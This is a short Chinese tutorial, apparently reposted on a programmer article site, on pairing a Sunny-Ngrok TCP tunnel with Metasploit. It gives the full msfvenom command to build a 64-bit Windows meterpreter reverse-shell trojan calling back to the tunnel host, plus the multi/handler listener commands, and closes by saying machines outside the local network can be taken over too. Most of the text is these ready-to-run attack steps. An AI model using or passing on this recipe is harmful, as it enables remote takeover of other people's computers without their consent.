metasploit学习--Sunny-Ngrok内网穿透
程序员文章站
2022-07-15 13:41:47
...
一、Sunny-Ngrok内网穿透
1.首先去官网注册账号,然后购买隧道
2.选择开通隧道,选免费的那个,然后选择tcp,其他随便写,本地端口就写127.0.0.1:xxx实际端口
3.下载客户端http://www.ngrok.cc/download.html,什么版本就下对应版本
4.登陆隧道./sunny clientid 隧道id
查看隧道id
5.生成木马
msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp LHOST=xxx.idcfengye.com LPORT=xxxx -f exe -o shell.exe
这里的LHOST=xxx.idcfengye.com是获取到的服务器地址免费的一般是free,LPORT是你刚刚设置的隧道端口比如我的是10210,那么这里就填10210,对应版本的木马在前面更改一下就可以了。
注意:
-a x64位,一定要对应-p x64位。
简单点来说,生成的exe是64位的,最好是只在64位的电脑上去运行。
千万不要把生成32位的exe放到64位的电脑上去运行,那样会造成失败或内存、CPU很高的情况。
6.msf开启监听,使用模块
msf5> use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 127.0.0.1
msf5 exploit(multi/handler) > set lport xxxx
msf5 exploit(multi/handler) > exploit
这里的端口是你设置的本地端口,我设置的是2333,那么就填2333,一切就绪就run
7.结果,获取成功
外网主机也可以获取
上一篇: Java String 引用类型